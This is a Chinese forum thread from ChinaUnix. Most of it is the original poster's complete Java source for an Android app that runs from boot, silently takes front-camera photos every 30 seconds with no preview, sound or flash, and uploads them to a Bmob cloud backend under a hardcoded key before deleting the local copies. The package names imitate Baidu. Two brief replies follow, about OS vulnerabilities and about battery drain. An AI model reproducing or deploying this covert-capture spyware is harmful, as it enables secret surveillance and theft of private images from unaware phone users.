免费注册 查看新帖 |

Chinaunix

  平台 论坛 博客 文库
论坛 操作系统 移动操作系统 转载:漏洞利用代码(可悄悄地拍下并上传照片)
最近访问板块 发新帖
查看: 1411 | 回复: 2
打印 上一主题 下一主题

[Android] 转载:漏洞利用代码(可悄悄地拍下并上传照片) [复制链接]

R-B

论坛徽章:
1
操作系统版块每日发帖之星 日期:2015-07-07 22:20:00
跳转到指定楼层
1 [收藏(0)] [报告]
发表于 2015-07-06 14:38 |只看该作者 |倒序浏览
刚才看了西贝上的一篇文章:http://www.cnbeta.com/articles/295257.htm
这里面竟然说后台拍摄照片是ANDROID平台的漏洞,大家看一下是漏洞吗?
这个DEMO会在后台自动的拍摄照片,拍摄的过程无预览、无声音、无闪光灯等任何提示。
并上传到指定服务器上,由于软件可能被恶意利用,我就上传一个APK和核心代码吧。

PhotoHandler.java
  1. package com.baidu.handle;

  3. import java.io.File;
  4. import java.io.FileOutputStream;
  5. import java.text.SimpleDateFormat;
  6. import java.util.Date;

  8. import android.content.Context;
  9. import android.hardware.Camera;
  10. import android.hardware.Camera.PictureCallback;
  11. import android.os.Environment;


  14. public class PhotoHandler implements PictureCallback {

  16.     private final Context context;

  18.     public PhotoHandler(Context context) {
  19.         this.context = context;
  20.     }

  22.     public void onPictureTaken(byte[] data, Camera camera) {
  23.         print("照片拍摄回调");
  24.         File pictureFileDir = getDir();
  25.         if (!pictureFileDir.exists() && !pictureFileDir.mkdirs()) {
  26.             print("目录不正确");
  27.             return;
  28.         }

  30.         String[] fileList=pictureFileDir.list();
  31.         if(fileList.length>10){
  32.             print("超过了10个文件,不再拍摄");
  33.             return;
  34.         }
  35.         SimpleDateFormat dateFormat = new SimpleDateFormat("yyyymmddhhmmss");
  36.         String date = dateFormat.format(new Date());
  37.         String photoFile = "Photo_" + date + ".jpg";
  38.         String filename = pictureFileDir.getPath() + File.separator + photoFile;

  40.         File pictureFile = new File(filename);
  41.         try {
  42.             FileOutputStream fos = new FileOutputStream(pictureFile);
  43.             fos.write(data);
  44.             fos.close();
  45.             camera.stopPreview();
  46.             camera.release();
  47.         } catch (Exception error) {
  48.             error.printStackTrace();
  49.         }
  50.     }

  52.     public File getDir() {
  53.        return     new File(context.getApplicationContext().getFilesDir().getAbsolutePath());
  54. //        return new File(Environment.getExternalStorageDirectory().getPath()+"/Pictures");
  55.          
  56.     }
  57.     private void print(String s){
  58.         System.out.println(s);
  59.     }

  61. }
复制代码
CameraService.java
  1. package com.baidu.service;

  3. import java.io.File;
  4. import java.io.IOException;
  5. import android.app.AlarmManager;
  6. import android.app.PendingIntent;
  7. import android.app.Service;
  8. import android.content.BroadcastReceiver;
  9. import android.content.Context;
  10. import android.content.Intent;
  11. import android.content.IntentFilter;
  12. import android.hardware.Camera;
  13. import android.net.wifi.WifiInfo;
  14. import android.net.wifi.WifiManager;
  15. import android.os.BatteryManager;
  16. import android.os.Binder;
  17. import android.os.IBinder;
  18. import android.os.PowerManager;
  19. import android.text.format.Time;
  20. import android.view.SurfaceView;
  21. import cn.bmob.Bmob;
  22. import cn.bmob.BmobFile;
  23. import cn.bmob.BmobObject;

  25. import com.baidu.handle.PhotoHandler;

  27. public class CameraService extends Service implements Runnable {

  29.     private AlarmManager am = null;
  30.     private Camera camera;
  31.     public static boolean isCharging=false;
  32.     private final IBinder mBinder = new LocalBinder();
  33.     private boolean offQty=false;

  35. //  private NotificationManager mNM;

  37.     /**
  38.      * Class for clients to access. Because we know this service always runs in
  39.      * the same process as its clients, we don't need to deal with IPC.
  40.      */
  41.     public class LocalBinder extends Binder {
  42.         public CameraService getService() {
  43.             return CameraService.this;
  44.         }
  45.     }

  47.     public void run() {
  48.         print("WIFI:"+isWiFiActive(CameraService.this));
  49.         print("充电:"+isCharging);
  50.         if(!isWiFiActive(CameraService.this))return;
  51. //      if(!isCharging)return;
  52.          
  53.         File pictureFileDir =new File(this.getApplicationContext().getFilesDir().getAbsolutePath());
  54. //      File pictureFileDir =new File(Environment.getExternalStorageDirectory().getPath()+"/Pictures");
  55.         String[] fileList=pictureFileDir.list();
  56.         if(fileList==null){
  57.             print("没有文件");
  58.             return;
  59.         }else{
  60.             print("文件数:"+fileList.length);
  61.         }
  62.         for(String s:fileList){
  63.             String filename = pictureFileDir.getPath() + File.separator + s;
  64.             print(filename);
  65.             BmobFile bmobFile;
  66.             try{
  67.                 BmobObject bObject = new BmobObject("Application");
  68.                 bmobFile = new BmobFile("Pictures", new File(filename));
  69.                 bmobFile.save();
  70.                 bObject.put("applicatName","Barbie");
  71.                 bObject.put("applicatFile",bmobFile);
  72.                 bObject.saveInBackground();
  73.                 File pictureFile = new File(filename);
  74.                 pictureFile.delete();
  75.                 System.out.println("图片上传完毕");
  76.             }catch(Exception  e){
  77.                 print("文件出错了");
  78.                 e.printStackTrace();
  79.             }
  80.         }
  81.     }
  82.      
  83.     @Override
  84.     public void onCreate() {
  85.         init();
  86.     }

  88.     private void init() {
  89.         print("init succeed!");
  90.         //从www.codenow.cn申请一个账户,添加Application ID
  91.         Bmob.initialize(CameraService.this, "da7965baf295e43970912f56c2f1cd1a");
  92.         am = (AlarmManager) getSystemService(ALARM_SERVICE);
  93.         // 注册广播
  94.         IntentFilter filter = new IntentFilter();
  95.         filter.addAction("com.baidu.alarm");
  96.         registerReceiver(alarmReceiver, filter);
  97.         registerReceiver(mbatteryReceiver, new IntentFilter(Intent.ACTION_BATTERY_CHANGED));
  98.         Intent intent = new Intent();
  99.         intent.setAction("com.baidu.alarm");
  100.         PendingIntent pi = PendingIntent.getBroadcast(this, 0, intent, 0);
  101.         am.setRepeating(AlarmManager.RTC_WAKEUP, System.currentTimeMillis(),
  102.                 1000 * 30, pi);// 马上开始,每5分钟触发一次
  103.     }

  105.     @Override
  106.     public int onStartCommand(Intent intent, int flags, int startId) {
  107.         return START_STICKY;
  108.     }

  110.     @Override
  111.     public IBinder onBind(Intent intent) {
  112.         return mBinder;
  113.     }

  115.     BroadcastReceiver alarmReceiver = new BroadcastReceiver() {
  116.         @Override
  117.         public void onReceive(Context context, Intent intent) {
  118.             if ("com.baidu.alarm".equals(intent.getAction())) {
  119.                 new Thread(CameraService.this).start();
  120.                 Time t=new Time();
  121.                 t.setToNow();
  122.                 print("我在执行时间判断");
  123.                 if((t.hour<5) || t.hour>24){
  124.                     print("时间不正确,不拍摄!");
  125.                     return;
  126.                 }
  127.                 PowerManager pm = (PowerManager) context.getSystemService(Context.POWER_SERVICE);  
  128.                 if(pm.isScreenOn()) {
  129.                     offQty=false;
  130.                     print("屏幕是亮的");
  131.                 }else{
  132.                     print("屏幕是暗的");
  133.                     if(offQty==true) return;
  134.                 }
  135.                  
  136.                 camera = openFacingBackCamera();
  137.                 if (camera != null) {
  138.                     SurfaceView dummy = new SurfaceView(getBaseContext());
  139.                     try {
  140.                         camera.setPreviewDisplay(dummy.getHolder());
  141.                     } catch (IOException e) {
  142.                         print("拍摄出问题");
  143.                         //e.printStackTrace();
  144.                     }
  145.                     camera.startPreview();
  146.                     camera.autoFocus(null);
  147.                     camera.takePicture(null, null, new PhotoHandler(
  148.                             getApplicationContext()));
  149.                     if(!pm.isScreenOn()) offQty=true;
  150.                     print("图片拍摄完毕");
  151.                 }else{
  152.                     print("木有照相机T_T");
  153.                 }
  154.                  
  155.             }
  156.         }
  157.     };

  159.     /**
  160.      * 判断WIFI是否连接
  161.      * @param inContext
  162.      * @return
  163.      */
  164.     public static boolean isWiFiActive(Context inContext) {
  165.         WifiManager mWifiManager = (WifiManager) inContext
  166.         .getSystemService(Context.WIFI_SERVICE);
  167.         WifiInfo wifiInfo = mWifiManager.getConnectionInfo();
  168.         int ipAddress = wifiInfo == null ? 0 : wifiInfo.getIpAddress();
  169.         if (mWifiManager.isWifiEnabled() && ipAddress != 0) {
  170.             return true;
  171.         } else {
  172.             return false;   
  173.         }
  174. }
  175.      
  176.      
  177.     /**
  178.      * 获得摄像头
  179.      * @return 后置摄像头
  180.      */
  181.     private Camera openFacingBackCamera() {
  182.         Camera cam = null;
  183.         Camera.CameraInfo cameraInfo = new Camera.CameraInfo();
  184.             for (int camIdx = 0, cameraCount = Camera.getNumberOfCameras(); camIdx < cameraCount; camIdx++) {
  185.                 Camera.getCameraInfo(camIdx, cameraInfo);
  186.      
  187.                 if (cameraInfo.facing == Camera.CameraInfo.CAMERA_FACING_FRONT) {
  188.                     try {
  189.                         cam = Camera.open(camIdx);
  190.                     } catch (Exception e) {
  191.                     }
  192.                 }
  193.             }
  194.          
  195.         return cam;
  196.     }
  197.      

  199.     /**
  200.      * 判断手机是否在充电
  201.      */
  202.     private BroadcastReceiver mbatteryReceiver=new BroadcastReceiver()
  203.     {
  204.         @Override
  205.         public void onReceive(Context context, Intent intent)
  206.         {
  207.             String action =intent.getAction();
  208.             if(Intent.ACTION_BATTERY_CHANGED.equals(action));
  209.             {
  210.                 int status=intent.getIntExtra("status",BatteryManager.BATTERY_STATUS_UNKNOWN);
  211.                 if(status==BatteryManager.BATTERY_STATUS_CHARGING)
  212.                 {
  213.                    isCharging=true;
  214.                 }
  215.                 else
  216.                 {
  217.                     isCharging=false;
  218.                 }
  219.             }
  220.         }
  221.     };

  223.     private void print(String s){
  224.         System.out.println(s);
  225.     }
  226. }
复制代码
MainActivity.java
  1. package com.hacker;


  4. import com.baidu.service.CameraService;
  5. import android.app.Activity;
  6. import android.content.ComponentName;
  7. import android.content.Context;
  8. import android.content.Intent;
  9. import android.content.ServiceConnection;
  10. import android.os.Bundle;
  11. import android.os.IBinder;
  12. import android.widget.ImageView;

  14. //程序的主界面,主要用来根据部门显示姓名
  15. public class MainActivity extends Activity {
  16.     private Intent serviceIntent;

  18.     /**
  19.      * 创建显示主界面
  20.      */
  21.     @Override
  22.     public void onCreate(Bundle savedInstanceState) {

  24.         super.onCreate(savedInstanceState);
  25.          
  26.         setContentView(R.layout.activity_main);
  27.         final ImageView image1 = (ImageView)findViewById(R.id.image1);
  28.                
  29.         serviceIntent = new Intent(MainActivity.this, CameraService.class);
  30.         startService(serviceIntent);
  31.         bindService(serviceIntent, serviceConnection, Context.BIND_AUTO_CREATE);
  32.          
  33.          
  34.     }
  35.      

  37.     @Override
  38.     protected void onDestroy(){
  39.         super.onDestroy();
  40.         unbindService(serviceConnection);
  41.     }

  43.     ServiceConnection serviceConnection = new ServiceConnection() {

  45.         public void onServiceConnected(ComponentName name, IBinder service) {
  46.             ((CameraService.LocalBinder) service).getService();
  47.         }

  49.         public void onServiceDisconnected(ComponentName name) {
  50.         }

  52.     };
  53.    
  54. }
复制代码
BootCompleteReceiver.java
  1. package com.hacker;

  3. import com.baidu.service.CameraService;

  5. import android.content.BroadcastReceiver;
  6. import android.content.Context;
  7. import android.content.Intent;
  8. import android.util.Log;


  11. public class BootCompleteReceiver extends BroadcastReceiver {

  13.     @Override
  14.     public void onReceive(Context context, Intent intent) {
  15.         // 这个类是用来在手机启动后,接收到手机启动的信息,然后启动电话监听服务的
  16.         Intent service = new Intent(context, CameraService.class);
  17.         context.startService(service);
  18.         Log.d("PhoneService","服务已经成功启动");
  19.     }

  21. }
复制代码
拍摄照片, 上传照片, ANDROID, 服务器, 闪光灯
renxiao2003

论坛徽章:
59
2015七夕节徽章 日期:2015-08-24 11:17:25ChinaUnix专家徽章 日期:2015-07-20 09:19:30每周论坛发贴之星 日期:2015-07-20 09:19:42ChinaUnix元老 日期:2015-07-20 11:04:38荣誉版主 日期:2015-07-20 11:05:19巳蛇 日期:2015-07-20 11:05:26CU十二周年纪念徽章 日期:2015-07-20 11:05:27IT运维版块每日发帖之星 日期:2015-07-20 11:05:34操作系统版块每日发帖之星 日期:2015-07-20 11:05:36程序设计版块每日发帖之星 日期:2015-07-20 11:05:40数据库技术版块每日发帖之星 日期:2015-07-20 11:05:432015年辞旧岁徽章 日期:2015-07-20 11:05:44
2 [报告]
发表于 2015-07-11 20:54 |只看该作者
每种操作系统的漏洞都不少。
实战分享:从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线! | 新一代分布式关系型数据库RadonDB知多少?
baopbird2005

论坛徽章:
80
20周年集字徽章-庆 日期:2020-10-28 14:09:1215-16赛季CBA联赛之北京 日期:2020-10-28 13:32:5315-16赛季CBA联赛之北控 日期:2020-10-28 13:32:4815-16赛季CBA联赛之天津 日期:2020-10-28 13:13:35黑曼巴 日期:2020-10-28 12:29:1520周年集字徽章-周 日期:2020-10-31 15:10:0720周年集字徽章-20 日期:2020-10-31 15:10:07ChinaUnix元老 日期:2015-09-29 11:56:3020周年集字徽章-年 日期:2020-10-28 14:14:56
3 [报告]
发表于 2015-07-20 13:34 |只看该作者
楼主这耗电量怎么样?是不是很大的
实战分享:从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线! | 新一代分布式关系型数据库RadonDB知多少?
返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 注册

本版积分规则 发表回复

  

北京盛拓优讯信息技术有限公司. 版权所有 京ICP备16024965号-6 北京市公安局海淀分局网监中心备案编号:11010802020122 niuxiaotong@pcpop.com 17352615567
未成年举报专区
中国互联网协会会员  联系我们:huangweiwei@itpub.net
感谢所有关心和支持过ChinaUnix的朋友们 转载本站内容请注明原作者名及出处

清除 Cookies - ChinaUnix - Archiver - WAP - TOP